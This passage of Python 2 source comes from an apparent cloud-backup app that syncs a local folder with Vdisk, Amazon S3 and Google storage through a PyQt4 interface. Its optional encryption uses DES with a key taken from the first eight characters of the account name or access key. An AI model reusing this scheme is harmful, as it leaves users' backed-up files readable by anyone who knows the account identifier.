'to_dir_id': to_dir_id,
'dologid': self.dologid})
def move_file(self, fid, new_name, to_dir_id):
'''
:param fid: file id
:param new_name: new name of the file
:param to_dir_id: the id of dir which file moved to
:return: the return data.
The example:
{
"name":"\u79fb\u52a8\u540e.rar",
"dir_id":3929,
"fid":219379,
"url":"http:\/\/openapi.vdisk.me\/ope……%A8%E5%90%8E.rar"
}
'''
return self._base_oper('m=file&a=move_file', {'token': self.token,
'fid': fid,
'new_name': new_name,
'to_dir_id': to_dir_id,
'dologid': self.dologid})
def rename_file(self, fid, new_name):
'''
:param fid: file id
:param new_name: new name of the file
'''
return self._base_oper('m=file&a=rename_file', {'token': self.token,
'fid': fid,
'new_name': new_name,
'dologid': self.dologid})
def share_file(self, fid, ip=None):
'''
:param fid: file id
:param new_name: new name of the file
:return: the return data.
The example:
{
"download_page":"http:\/\/vdisk.me\/?m=share&a=dow……"
}
'''
params = {'token': self.token,
'fid': fid,
'dologid': self.dologid
}
if ip is not None:
params['ip'] = ip
return self._base_oper('m=file&a=share_file', params)
def cancel_share_file(self, fid):
'''
:param fid: file id
'''
return self._base_oper('m=file&a=cancel_share_file', {'token': self.token,
'fid': fid,
'dologid': self.dologid})
def get_dirid_with_path(self, path):
'''
Get the dir id by the path of it.
:param path: path of the dir
:return: the dir id of path.
'''
return self._base_oper('m=dir&a=get_dirid_with_path', {
'token': self.token,
'path': path,
'dologid': self.dologid
})['id']
class CryptoVdiskClient(VdiskClient):
'''
Almost like VdiskClient, but supports uploading and downloading files with crypto.
Usage:
client = CryptoVdiskClient('your_app_key', 'your_app_secret') # init
client.auth('your_account', 'your_password', '12345678') # auth, the third param (the IV) must be 8 characters long
client.upload_file('/from_path/file_name', 0, True) # call the vdisk api
'''
def auth(self, account, password, IV, app_type="local"):
super(CryptoVdiskClient, self).auth(account, password, app_type)
self.des = DES(IV)
def upload_file(self, filename, dir_id, cover, upload_name='', maxsize=10, callback=None, dir_=None, encrypt=True):
return super(CryptoVdiskClient, self).upload_file(filename, dir_id, cover, upload_name,
maxsize, callback, dir_,
encrypt, self.des.encrypt)
def download_file(self, fid, filename, decrypt=True):
super(CryptoVdiskClient, self).download_file(fid, filename, decrypt, self.des.decrypt)
```
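`get_signature` above joins the sorted parameters as `&`-separated `k=v` pairs and signs them with HMAC-SHA256 under the app secret; a standalone sketch using only the standard library (assuming, as the name `hmac_sha256_hex` suggests, that the utils helper returns a hex digest):
```python
import hmac
import hashlib

def sign(data, app_secret):
    # Same layout as get_signature(): sorted keys, 'k=v' pairs joined by '&'.
    data_str = '&'.join('%s=%s' % (k, data[k]) for k in sorted(data))
    return hmac.new(app_secret, data_str, hashlib.sha256).hexdigest()

print sign({'account': 'a', 'appkey': 'K', 'time': 1288781102}, 'SECRET')
```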
#### File: CloudBackup/CloudBackup/local.py
```python
import threading
import os
import time
import hashlib
import logging
from cloud import Storage, S3Storage
from utils import join_local_path, get_sys_encoding, get_info_path, ensure_folder_exsits
from CloudBackup.log import Log
from CloudBackup.lib.vdisk import VdiskClient
from CloudBackup.lib.errors import VdiskError, CloudBackupLibError, GSError, S3Error
SPACE_REPLACE = '#$&'
DEFAULT_SLEEP_MINUTS = 5
DEFAULT_SLEEP_SECS = DEFAULT_SLEEP_MINUTS * 60
class FileEntry(object):
def __init__(self, path, timestamp, md5, **kwargs):
self.path = path
self.timestamp = timestamp
self.md5 = md5
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.calc_md5 = lambda data: hashlib.md5(data).hexdigest()
def get_md5(self):
if self.md5:
return self.md5
if os.path.exists(self.path):
fp = open(self.path, 'rb')
try:
content = fp.read()
if hasattr(self, 'encrypt_func'):
content = self.encrypt_func(content)
md5 = self.calc_md5(content)
return md5
finally:
fp.close()
class VdiskRefreshToken(threading.Thread):
stopped = False
def __init__(self, client):
assert isinstance(client, VdiskClient)
super(VdiskRefreshToken, self).__init__()
self.client = client
def refresh_token(self):
self.client.keep_token()
def stop(self):
self.stopped = True
def run(self, sleep_minutes=10, sleep_interval=30):
count = 0
while not self.stopped:
if count == (sleep_minutes * 60 / sleep_interval):
self.refresh_token()
time.sleep(sleep_interval)
count += 1
class SyncHandler(threading.Thread):
stopped = False
def __init__(self, storage, folder_name,
loop=True, sec=DEFAULT_SLEEP_SECS, log=False, log_obj=None):
super(SyncHandler, self).__init__()
assert isinstance(storage, Storage)
self.storage = storage
self.folder_name = folder_name
self.loop = loop
self.sec = sec
self.encoding = get_sys_encoding()
self.calc_md5 = lambda data: hashlib.md5(data).hexdigest()
# init the error log
self.error_log = logging.getLogger()
info_path = get_info_path()
ensure_folder_exsits(info_path)
handler = logging.FileHandler(os.path.join(info_path, '.log'))
self.error_log.addHandler(handler)
self.error_log.setLevel(logging.DEBUG)
# init the action log
self.log = log
if log and log_obj:
self.log_obj = log_obj
elif log:
log_file = os.path.join(self.folder_name,
'.%s.log.txt' % self.storage.__class__.__name__.rsplit('Storage')[0].lower())
self.log_obj = Log(log_file)
def local_to_cloud(self, path, timestamp):
splits = path.rsplit('.', 1)
if len(splits) == 1:
splits.append(str(timestamp))
else:
splits.insert(-1, str(timestamp))
return '.'.join(splits).replace(' ', SPACE_REPLACE)
def cloud_to_local(self, path):
path = path.replace(SPACE_REPLACE, ' ')
splits = path.rsplit('.', 2)
if len(splits) == 2:
try:
timestamp = int(splits.pop(-1))
return splits[0], timestamp
except ValueError:
return path, -1
elif len(splits) == 3:
try:
timestamp = int(splits.pop(-2))
return '.'.join(splits), timestamp
except ValueError:
return path, -1
else:
return path, -1
def list_cloud(self, cloud_path, recursive=False):
for f in self.storage.list(cloud_path, recursive):
f.cloud_path = f.path
path, _ = self.cloud_to_local(f.path)
path = path.encode('utf-8')
f.path = path
yield f
def _get_cloud_files(self):
files = {}
for f in self.storage.list_files('', True):
path, timestamp = self.cloud_to_local(f.path)
path = path.encode('utf-8')
files[path] = FileEntry(f.path, timestamp, f.md5)
return files
def _is_folder_exclude(self, folder_name):
for name in folder_name.split(os.sep):
if name.startswith('.'):
return True
return False
def _get_local_files(self):
files = {}
folder_name = self.folder_name if self.folder_name.endswith(os.sep) \
else self.folder_name+os.sep
for dirpath, dirnames, filenames in os.walk(self.folder_name):
if self._is_folder_exclude(dirpath):
continue
for filename in filenames:
if filename.startswith('.'):
continue
abs_filename = os.path.join(dirpath, filename)
rel_path = abs_filename.split(folder_name, 1)[1]
if isinstance(rel_path, unicode):
rel_path = rel_path.encode('utf-8')
else:
rel_path = rel_path.decode(self.encoding).encode('utf-8')
timestamp = int(os.path.getmtime(abs_filename))
if hasattr(self.storage.client, 'des'):
func = self.storage.client.des.encrypt
entry = FileEntry(abs_filename, timestamp, None, encrypt_func=func)
else:
entry = FileEntry(abs_filename, timestamp, None)
if os.sep == '/':
files[rel_path] = entry
else:
files[rel_path.replace(os.sep, '/')] = entry
return files
def _upload(self, f, local_files_tm, cloud_files_tm):
entry = local_files_tm[f]
filename, timestamp = entry.path, entry.timestamp
cloud_path = self.local_to_cloud(f, timestamp)
def _action(try_times=3, sleep_sec=3):
tries = 0
while tries <= try_times:
try:
self.storage.upload(cloud_path, filename)
break
except VdiskError, e:
if e.err_no == 6 or e.err_no == 5:
time.sleep(sleep_sec)
tries += 1
else:
raise e
except GSError, e:
self.error_log.info('upload of file %s failed.' % f)
raise e
_action()
if self.log:
self.log_obj.write('Uploaded file: %s' % f)
def _download(self, f, local_files_tm, cloud_files_tm):
filename = join_local_path(self.folder_name,
f.decode('utf-8'))
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
cloud_path = cloud_files_tm[f].path
self.storage.download(cloud_path, filename)
if self.log:
self.log_obj.write('Downloaded file: %s' % f)
def sync(self):
try:
local_files_tm = self._get_local_files()
cloud_files_tm = self._get_cloud_files()
local_files = set(local_files_tm.keys())
cloud_files = set(cloud_files_tm.keys())
for f in (local_files - cloud_files):
if self.stopped: return
self._upload(f, local_files_tm, cloud_files_tm)
for f in (cloud_files - local_files):
if self.stopped: return
self._download(f, local_files_tm, cloud_files_tm)
for f in (cloud_files & local_files):
if self.stopped: return
local_entry = local_files_tm[f]
cloud_entry = cloud_files_tm[f]
if local_entry.get_md5() != cloud_entry.get_md5():
if local_entry.timestamp < cloud_entry.timestamp:
self._download(f, local_files_tm, cloud_files_tm)
elif local_entry.timestamp > cloud_entry.timestamp:
self._upload(f, local_files_tm, cloud_files_tm)
except CloudBackupLibError, e:
self.error_log.exception(str(e))
def stop(self):
self.stopped = True
def run(self):
if self.folder_name is None or \
len(self.folder_name) == 0:
return
self.sync()
while self.loop and not self.stopped:
time.sleep(self.sec)
self.sync()
class S3SyncHandler(SyncHandler):
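# Variant of SyncHandler for S3: object keys are stored raw-unicode-escape
# encoded, so listing and upload re-encode paths accordingly.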
def __init__(self, storage, folder_name, loop=True, sec=DEFAULT_SLEEP_SECS,
log=False, log_obj=None):
super(S3SyncHandler, self).__init__(storage, folder_name, loop, sec, log, log_obj)
assert isinstance(storage, S3Storage)
def list_cloud(self, cloud_path, recursive=False):
for f in self.storage.list(cloud_path, recursive):
f.cloud_path = f.path
path, _ = self.cloud_to_local(f.path)
if isinstance(path, str):
path = path.decode('raw-unicode-escape').encode('utf-8')
elif isinstance(path, unicode):
path = path.encode('utf-8')
f.path = path
yield f
def _get_cloud_files(self):
files = {}
for f in self.storage.list_files('', True):
path, timestamp = self.cloud_to_local(f.path)
if isinstance(path, str):
path = path.decode('raw-unicode-escape').encode('utf-8')
elif isinstance(path, unicode):
path = path.encode('utf-8')
files[path] = FileEntry(f.path, timestamp, f.md5)
return files
def _upload(self, f, local_files_tm, cloud_files_tm):
entry = local_files_tm[f]
filename, timestamp = entry.path, entry.timestamp
f_ = f.decode('utf-8').encode('raw-unicode-escape')
cloud_path = self.local_to_cloud(f_, timestamp)
try:
self.storage.upload(cloud_path, filename)
except S3Error, e:
self.error_log.info('upload file %s happens an error.' % f)
raise e
if self.log:
self.log_obj.write('上传了文件:%s' % f)
```
#### File: CloudBackup/CloudBackup/log.py
```python
import os
import time
from utils import win_hide_file
class Log(object):
def __init__(self, log_file, hide=True):
self.log_file = log_file
self.hide = hide
def _win_hide(self):
if self.hide:
win_hide_file(self.log_file)
def _ensure_folder_exists(self):
dirname = os.path.dirname(self.log_file)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
def write(self, itm):
self._ensure_folder_exists()
fp = open(self.log_file, 'a+')
try:
time_str = time.strftime("%Y-%m-%d %X", time.localtime())
content = '%s %s\n' % (time_str, itm)
fp.write(content)
self._win_hide()
finally:
fp.close()
def write_logs(self, itms):
self._ensure_folder_exists()
fp = open(self.log_file, 'a+')
try:
for itm in itms:
time_str = time.strftime("%Y-%m-%d %X", time.localtime())
content = '%s %s\n' % (time_str, itm)
fp.write(content)
self._win_hide()
finally:
fp.close()
def get_logs(self):
if not os.path.exists(self.log_file):
return
fp = open(self.log_file)
for itm in reversed(fp.readlines()):
content = itm.strip()
if len(content) > 0:
yield content
```
#### File: CloudBackup/ui/main.py
```python
import os
import threading
import time
from PyQt4 import QtCore ,QtGui
from CloudBackup.environment import Environment
from CloudBackup.lib.errors import VdiskError, S3Error, GSError, CloudBackupLibError
from CloudBackup.cloud import CloudFile, CloudFolder
import CloudBackup.mail
import CloudBackup_UI
import VDiskLogin_UI
import VDiskShare_UI
import S3Login_UI
import S3Share_UI
import GoogleCloudLogin_UI
import GoogleCloudShare_UI
class CloudBrowserFlushThread(QtCore.QThread):
def __init__(self, base_ui, browser_ui, handler):
super(CloudBrowserFlushThread, self).__init__()
self.base_ui = base_ui
self.ui = browser_ui
self.handler = handler
self.stopped = False
def generate_cloud_tree(self, path='', parent=None):
"""
show the files that synchronized with the cloud
"""
if self.handler is None or self.stopped:
return
if parent is None:
return
for itm in self.handler.list_cloud(path):
if itm is None or self.stopped: return
try:
widget_itm = QtGui.QTreeWidgetItem(parent)
widget_itm.setText(0,
QtCore.QString(itm.path.split('/')[-1].decode('utf-8')))
if isinstance(itm, CloudFile):
widget_itm.setToolTip(0, QtCore.QString(itm.cloud_path))
elif isinstance(itm, CloudFolder):
self.generate_cloud_tree(itm.cloud_path, widget_itm)
except RuntimeError:
pass
def cloud_browser_flush(self):
root = self.base_ui.add_root_to_cloud_browser(self.ui)
try:
self.generate_cloud_tree(parent=root)
except CloudBackupLibError, e:
self.handler.error_log.exception(str(e))
def run(self):
self.cloud_browser_flush()
def stop(self):
self.stopped = True
class LogFlushThread(QtCore.QThread):
def __init__(self, ui, handler):
super(LogFlushThread, self).__init__()
self.ui = ui
self.handler = handler
self.stopped = False
def show_logs(self):
if self.handler is None or self.stopped:
return
if self.stopped: return
for log in self.handler.log_obj.get_logs():
if log is None or self.stopped: return
splits = log.split(' ', 2)
if len(splits) == 3:
stime = ' '.join((splits[i] for i in range(2)))
saction = splits[2]
log = QtGui.QTreeWidgetItem(self.ui)
log.setText(0, QtCore.QString(stime))
log.setText(1, QtCore.QString(saction.decode('utf-8')))
def run(self):
self.show_logs()
def stop(self):
self.stopped = True
class UI(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self,parent)
self.ui = CloudBackup_UI.Ui_CloudBackupUI()
self.ui.setupUi(self)
self.env = Environment()
self.vdisk_handler = None
self.s3_handler = None
self.gs_handler = None
self.vdisk_info = self.env.load_vdisk_info()
self.s3_info = self.env.load_s3_info()
self.gs_info = self.env.load_gs_info()
self.vdisk_cloud_browser_thread = None
self.vdisk_cloud_browser_thread_lock = threading.Lock()
self.vdisk_log_thread = None
self.vdisk_log_thread_lock = threading.Lock()
self.s3_cloud_browser_thread = None
self.s3_cloud_browser_thread_lock = threading.Lock()
self.s3_log_thread = None
self.s3_log_thread_lock = threading.Lock()
self.gs_cloud_browser_thread = None
self.gs_cloud_browser_thread_lock = threading.Lock()
self.gs_log_thread = None
self.gs_log_thread_lock = threading.Lock()
self.vdisk_init()
self.s3_init()
self.gs_init()
# register the button functions under the VDisk sync file-dir
QtCore.QObject.connect(self.ui.button_v_dir, QtCore.SIGNAL("clicked()"),
self.set_sync_path(self.ui.tvdirpath))
QtCore.QObject.connect(self.ui.button_v_submit, QtCore.SIGNAL("clicked()"),
self.vdisk_dir_submit)
QtCore.QObject.connect(self.ui.button_v_reset, QtCore.SIGNAL("clicked()"),
self.vdisk_dir_reset)
QtCore.QObject.connect(self.ui.button_v_cloudflush, QtCore.SIGNAL("clicked()"),
self.vdisk_cloud_flush)
QtCore.QObject.connect(self.ui.button_v_share, QtCore.SIGNAL("clicked()"),
self.vdisk_file_share)
QtCore.QObject.connect(self.ui.button_v_logflush, QtCore.SIGNAL("clicked()"),
self.vdisk_log_flush)
# register the button functions under the S3 sync file-dir
QtCore.QObject.connect(self.ui.button_s_dir, QtCore.SIGNAL("clicked()"),
self.set_sync_path(self.ui.tsdirpath))
QtCore.QObject.connect(self.ui.button_s_submit, QtCore.SIGNAL("clicked()"),
self.s3_dir_submit)
QtCore.QObject.connect(self.ui.button_s_reset, QtCore.SIGNAL("clicked()"),
self.s3_dir_reset)
QtCore.QObject.connect(self.ui.button_s_cloudflush, QtCore.SIGNAL("clicked()"),
self.s3_cloud_flush)
QtCore.QObject.connect(self.ui.button_s_share, QtCore.SIGNAL("clicked()"),
self.s3_file_share)
QtCore.QObject.connect(self.ui.button_s_logflush, QtCore.SIGNAL("clicked()"),
self.s3_log_flush)
# register the button functions under the Google Cloud sync file-dir
QtCore.QObject.connect(self.ui.button_g_dir, QtCore.SIGNAL("clicked()"),
self.set_sync_path(self.ui.tgdirpath))
QtCore.QObject.connect(self.ui.button_g_submit, QtCore.SIGNAL("clicked()"),
self.gs_dir_submit)
QtCore.QObject.connect(self.ui.button_g_reset, QtCore.SIGNAL("clicked()"),
self.gs_dir_reset)
QtCore.QObject.connect(self.ui.button_g_cloudflush, QtCore.SIGNAL("clicked()"),
self.gs_cloud_flush)
QtCore.QObject.connect(self.ui.button_g_share, QtCore.SIGNAL("clicked()"),
self.gs_file_share)
QtCore.QObject.connect(self.ui.button_g_logflush, QtCore.SIGNAL("clicked()"),
self.gs_log_flush)
def get_holder(self, key, encrypt=False):
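# Build the per-account holder (bucket/container) name,
# e.g. "cldbkp_<key>" or "cldbkp_<key>_encrypt", lowercased.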
if encrypt:
holder = 'cldbkp_%s_encrypt' % str(key)
else:
holder = 'cldbkp_%s' % str(key)
return holder.lower()
def get_encrypt_code(self, key):
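# Derive an 8-character encryption code from the key by truncating
# or padding with '*'.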
if len(key) >= 8:
return key[:8]
return key + '*' * (8 - len(key))
def alert(self, msg):
if isinstance(msg, str):
msg = msg.decode('utf-8')
errorbox = QtGui.QMessageBox()
errorbox.setText(QtCore.QString(msg))
errorbox.setWindowTitle(QtCore.QString(u"需要提醒您:"))
errorbox.exec_()
def status_set(self, button, status_label, welcome_info):
button.setText(QtCore.QString(u'正在同步...'))
if isinstance(welcome_info, str):
welcome_info = welcome_info.decode('utf-8')
status_label.setText(QtCore.QString(welcome_info))
def status_reset(self, button, status_label):
button.setText(QtCore.QString(u'开始同步'))
status_label.setText(QtCore.QString(u'用户登录状态'))
def choose_dir(self):
"""
provide a dialog for the user to get the folder
"""
fd = QtGui.QFileDialog(self)
filedir = fd.getExistingDirectory(parent=None, caption="File Dir")
return filedir
def set_sync_path(self, ui):
def _action():
dir_ = self.choose_dir()
ui.setText(dir_)
return _action
def add_root_to_cloud_browser(self, ui):
root = QtGui.QTreeWidgetItem(ui)
root.setText(0, QtCore.QString(u'根目录'))
return root
def get_cloud_path(self, tree):
'''
get the cloud path of the selected file
'''
items = tree.selectedItems()
try:
path = items[0].toolTip(0)
path = unicode(path).encode('utf-8')
name = unicode(items[0].text(0)).encode('utf-8')
return path, name
except IndexError, e:
self.alert(u'请选择要分享的文件!')
return
except Exception, e:
self.alert(u'分享错误,请选择要分享的文件!')
return
def vdisk_init(self):
if self.vdisk_info is None:
return
if not os.path.exists(self.vdisk_info['local_folder']):
success = False
else:
success = self.vdisk_setup(**self.vdisk_info)
if success:
self.ui.tvdirpath.setText(
QtCore.QString(self.vdisk_info['local_folder']))
self.status_set(self.ui.button_v_submit,
self.ui.lvuserstate,
"Hello, 微盘用户 %s" % self.vdisk_info['account'])
else:
self.env.remove_vdisk_info()
self.vdisk_info = None
def vdisk_dir_reset(self):
"""
stop the current sync folder, clear all the associated info
"""
self.ui.tvdirpath.clear()
if self.vdisk_cloud_browser_thread:
self.vdisk_cloud_browser_thread.stop()
if self.vdisk_log_thread:
self.vdisk_log_thread.stop()
self.ui.VtreeWidget.clear()
self.ui.VlogTreeWidget.clear()
self.env.stop_vdisk()
self.vdisk_info = None
self.status_reset(self.ui.button_v_submit,
self.ui.lvuserstate)
def vdisk_dir_submit(self):
"""
submit the cloud info so that the selected folder becomes the sync folder
"""
if len(unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')) == 0:
self.alert(u"同步文件夹不能为空!")
return
if not os.path.exists(unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')):
self.alert(u"你所设置的路径不存在!")
return
if not self.vdisk_info:
self.vlogin = QtGui.QDialog()
self.vlogin.ui = VDiskLogin_UI.Ui_VDiskCloudLoginUI()
self.vlogin.ui.setupUi(self.vlogin)
QtCore.QObject.connect(self.vlogin.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.vdisk_login_submit)
QtCore.QObject.connect(self.vlogin.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.vdisk_login_reset)
self.vlogin.exec_()
else:
info = dict(self.vdisk_info)
info['local_folder'] = unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')
success = self.vdisk_setup(**info)
if not success:
self.alert('登录失败!')
def vdisk_login_submit(self):
"""
submit the cloud info to the cloud, show the files and the logs that are synchronized with the cloud
"""
user = str(self.vlogin.ui.tvuser.text())
pwd = str(self.vlogin.ui.tvpwd.text())
is_weibo = self.vlogin.ui.tvisweibo.isChecked()
encrypt = self.vlogin.ui.tvencrypt.isChecked()
local_folder = unicode(self.ui.tvdirpath.text()).encode('utf-8').decode('utf-8')
success = self.vdisk_setup(user, pwd, local_folder, is_weibo, encrypt)
if success:
self.status_set(self.ui.button_v_submit,
self.ui.lvuserstate,
"Hello, 微盘用户 %s" % self.vdisk_info['account'])
self.vlogin.close()
else:
self.alert('登录失败!')
def vdisk_setup(self, account, password, local_folder,
is_weibo=False, encrypt=False, encrypt_code=None, **kwargs):
"""
use the submitted cloud info to set up the cloud storage sync folder
"""
try:
args = locals()
del args['self']
force_stop = False
if self.vdisk_info is not None:
for k, v in args.iteritems():
if k in self.vdisk_info and self.vdisk_info[k] != v:
force_stop = True
break
holder = self.get_holder(account, encrypt)
encrypt_code = self.get_encrypt_code(account) if encrypt else None
self.vdisk_handler = self.env.setup_vdisk(
account, password, local_folder, holder,
is_weibo=is_weibo, encrypt=encrypt, encrypt_code=encrypt_code,
force_stop=force_stop)
if force_stop or self.vdisk_info is None:
self.vdisk_info = args
self.vdisk_cloud_flush()
self.vdisk_show_logs()
return True
except VdiskError:
return False
def vdisk_show_logs(self):
"""
show the logs about files that are synchronized with the cloud
"""
try:
self.vdisk_log_thread_lock.acquire()
if self.vdisk_log_thread and not self.vdisk_log_thread.isFinished():
self.vdisk_log_thread.stop()
self.vdisk_log_thread.wait()
self.ui.VlogTreeWidget.clearSelection()
self.ui.VlogTreeWidget.clear()
self.vdisk_log_thread = LogFlushThread(self.ui.VlogTreeWidget, self.vdisk_handler)
self.vdisk_log_thread.start()
finally:
self.vdisk_log_thread_lock.release()
def vdisk_login_reset(self):
"""
clear the info about the account in the cloud
"""
self.vlogin.ui.tvpwd.clear()
self.vlogin.ui.tvuser.clear()
def vdisk_cloud_flush(self):
'''
Flush the cloud files.
'''
self.vdisk_cloud_browser_thread_lock.acquire()
try:
if self.vdisk_handler is None:
return
if self.vdisk_cloud_browser_thread \
and not self.vdisk_cloud_browser_thread.isFinished():
self.vdisk_cloud_browser_thread.stop()
self.vdisk_cloud_browser_thread.exit()
self.vdisk_cloud_browser_thread.wait()
self.ui.VtreeWidget.clearSelection()
self.ui.VtreeWidget.clear()
self.vdisk_cloud_browser_thread = CloudBrowserFlushThread(
self, self.ui.VtreeWidget, self.vdisk_handler)
self.vdisk_cloud_browser_thread.start()
finally:
self.vdisk_cloud_browser_thread_lock.release()
def vdisk_file_share(self):
"""
share a synced file with others by email
"""
if self.vdisk_handler is None:
return
result = self.get_cloud_path(self.ui.VtreeWidget)
if result is None:
return
vdisk_file_path, vdisk_file_name = result
if vdisk_file_path is None or len(str(vdisk_file_path)) == 0:
self.alert('不支持文件夹分享,请选择文件')
return
self.vshare = QtGui.QDialog()
self.vshare.ui = VDiskShare_UI.Ui_Vdisk_Share()
self.vshare.ui.setupUi(self.vshare)
storage = self.vdisk_handler.storage
try:
sharepath = storage.share(vdisk_file_path.decode('utf-8'))
except VdiskError, e:
self.alert(e.msg)
return
self.vshare.ui.textareav.setText(QtCore.QString(
u'微盘用户%s通过邮件向你分享文件“%s”,下载地址:%s' % \
(self.vdisk_info['account'], vdisk_file_name.decode('utf-8'), sharepath))
)
QtCore.QObject.connect(self.vshare.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.vdisk_share_submit)
QtCore.QObject.connect(self.vshare.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.vdisk_share_reset)
QtCore.QObject.connect(self.vshare.ui.button_exit, QtCore.SIGNAL("clicked()"),
self.vdisk_share_exit)
self.vshare.exec_()
def vdisk_share_submit(self):
"""
submit the info about the email
"""
if self.vdisk_handler is not None:
receivers = str(self.vshare.ui.tvrec.text())
receivers = receivers.replace(',', ',').split(',')
email = CloudBackup.mail.send_mail(receivers, unicode(self.vshare.ui.tvtopic.text()).encode('utf-8'),
unicode(self.vshare.ui.textareav.toPlainText()).encode('utf-8'))
if email:
self.vshare.close()
self.alert(u'发送成功!')
else:
self.alert(u'发送失败!')
else:
return
def vdisk_share_reset(self):
"""
clear the info about the email
"""
self.vshare.ui.textareav.clear()
self.vshare.ui.tvrec.clear()
self.vshare.ui.tvtopic.clear()
def vdisk_share_exit(self):
"""
exit the email window
"""
self.vshare.close()
def vdisk_log_flush(self):
"""
flush the log display
"""
self.vdisk_show_logs()
def s3_init(self):
if self.s3_info is None:
return
if not os.path.exists(self.s3_info['local_folder']):
success= False
else:
success = self.s3_setup(**self.s3_info)
if success:
self.ui.tsdirpath.setText(
QtCore.QString(self.s3_info['local_folder']))
self.status_set(self.ui.button_s_submit,
self.ui.lsuserstate,
"Hello, Amazon S3用户 %s" % self.s3_display_name)
else:
self.env.remove_s3_info()
self.s3_info = None
def s3_dir_reset(self):
"""
stop the current sync folder, clear all the associated info
"""
self.ui.tsdirpath.clear()
if self.s3_cloud_browser_thread:
self.s3_cloud_browser_thread.stop()
if self.s3_log_thread:
self.s3_log_thread.stop()
self.ui.StreeWidget.clear()
self.ui.SlogTreeWidget.clear()
self.env.stop_s3()
self.s3_info = None
self.status_reset(self.ui.button_s_submit,
self.ui.lsuserstate)
def s3_dir_submit(self):
"""
submit the cloud info so that the selected folder becomes the sync folder
"""
if len(unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')) == 0:
self.alert(u"同步文件夹不能为空!")
return
if not os.path.exists(unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')):
self.alert(u"你所设置的路径不存在!")
return
if not self.s3_info:
self.slogin = QtGui.QDialog()
self.slogin.ui = S3Login_UI.Ui_S3CloudLoginUI()
self.slogin.ui.setupUi(self.slogin)
QtCore.QObject.connect(self.slogin.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.s3_login_submit)
QtCore.QObject.connect(self.slogin.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.s3_login_reset)
self.slogin.exec_()
else:
info = dict(self.s3_info)
info['local_folder'] = unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')
success = self.s3_setup(**info)
if not success:
self.alert('登录失败!')
def s3_login_submit(self):
"""
submit the cloud info to the cloud, show the files and the logs that are synchronized with the cloud
"""
access_key = str(self.slogin.ui.ts_access_key.text())
secret_access_key = str(self.slogin.ui.ts_secret_access_key.text())
local_folder = unicode(self.ui.tsdirpath.text()).encode('utf-8').decode('utf-8')
encrypt = self.slogin.ui.lsencrypt.isChecked()
success = self.s3_setup(access_key, secret_access_key, local_folder, encrypt)
if success:
self.status_set(self.ui.button_s_submit,
self.ui.lsuserstate,
"Hello, Amazon S3用户 %s" % self.s3_display_name)
self.slogin.close()
else:
self.alert('登录失败!')
def s3_setup(self, access_key, secret_access_key, local_folder,
encrypt=False, encrypt_code=None, **kwargs):
"""
use the submitted cloud info to set up the cloud storage sync folder
"""
try:
args = locals()
del args['self']
force_stop = False
if self.s3_info is not None:
for k, v in args.iteritems():
if k in self.s3_info and self.s3_info[k] != v:
force_stop = True
break
holder = self.get_holder(access_key, encrypt)
encrypt_code = self.get_encrypt_code(access_key) if encrypt else None
self.s3_handler = self.env.setup_s3(
access_key, secret_access_key, local_folder, holder,
encrypt=encrypt, encrypt_code=encrypt_code, force_stop=force_stop)
if force_stop or self.s3_info is None:
self.s3_info = args
self.s3_cloud_flush()
self.s3_show_logs()
self.s3_display_name = self.s3_handler.storage.client.list_buckets()[0].display_name
return True
except S3Error:
return False
def s3_show_logs(self):
"""
show the logs about files that are synchronized with the cloud
"""
try:
self.s3_log_thread_lock.acquire()
if self.s3_log_thread and not self.s3_log_thread.isFinished():
self.s3_log_thread.stop()
self.s3_log_thread.wait()
self.ui.SlogTreeWidget.clearSelection()
self.ui.SlogTreeWidget.clear()
self.s3_log_thread = LogFlushThread(self.ui.SlogTreeWidget, self.s3_handler)
self.s3_log_thread.start()
finally:
self.s3_log_thread_lock.release()
def s3_login_reset(self):
"""
clear the info about the account in the cloud
"""
self.slogin.ui.ts_access_key.clear()
self.slogin.ui.ts_secret_access_key.clear()
def s3_cloud_flush(self):
'''
Flush the cloud files.
'''
self.s3_cloud_browser_thread_lock.acquire()
try:
if self.s3_handler is None:
return
if self.s3_cloud_browser_thread \
and not self.s3_cloud_browser_thread.isFinished():
self.s3_cloud_browser_thread.stop()
self.s3_cloud_browser_thread.wait()
self.ui.StreeWidget.clearSelection()
self.ui.StreeWidget.clear()
self.s3_cloud_browser_thread = CloudBrowserFlushThread(
self, self.ui.StreeWidget, self.s3_handler)
self.s3_cloud_browser_thread.start()
finally:
self.s3_cloud_browser_thread_lock.release()
def s3_file_share(self):
"""
share a synced file with others by email
"""
if self.s3_handler is None:
return
result = self.get_cloud_path(self.ui.StreeWidget)
if result is None:
return
s3_file_path, s3_file_name = result
if s3_file_path is None or len(str(s3_file_path)) == 0:
self.alert('不支持文件夹分享,请选择文件')
return
self.sshare = QtGui.QDialog()
self.sshare.ui = S3Share_UI.Ui_S3_Share()
self.sshare.ui.setupUi(self.sshare)
storage = self.s3_handler.storage
sharepath = storage.share(s3_file_path)
self.sshare.ui.textareas.setText(QtCore.QString(
u'Amazon S3用户%s通过邮件向你分享文件“%s”,下载地址:%s' % \
(self.s3_display_name, s3_file_name, sharepath))
)
QtCore.QObject.connect(self.sshare.ui.button_submit, QtCore.SIGNAL("clicked()"),
self.s3_share_submit)
QtCore.QObject.connect(self.sshare.ui.button_reset, QtCore.SIGNAL("clicked()"),
self.s3_share_reset)
QtCore.QObject.connect(self.sshare.ui.button_exit, QtCore.SIGNAL("clicked()"),
self.s3_share_exit)
self.sshare.exec_()
def s3_share_submit(self):
"""
submit the info about the email
"""
if self.s3_handler is not None:
receivers = str(self.sshare.ui.tsrec.text())
receivers = receivers.replace(',', ',').split(',')
email = CloudBackup.mail.send_mail(receivers, unicode(self.sshare.ui.tstopic.text()).encode('utf-8'),
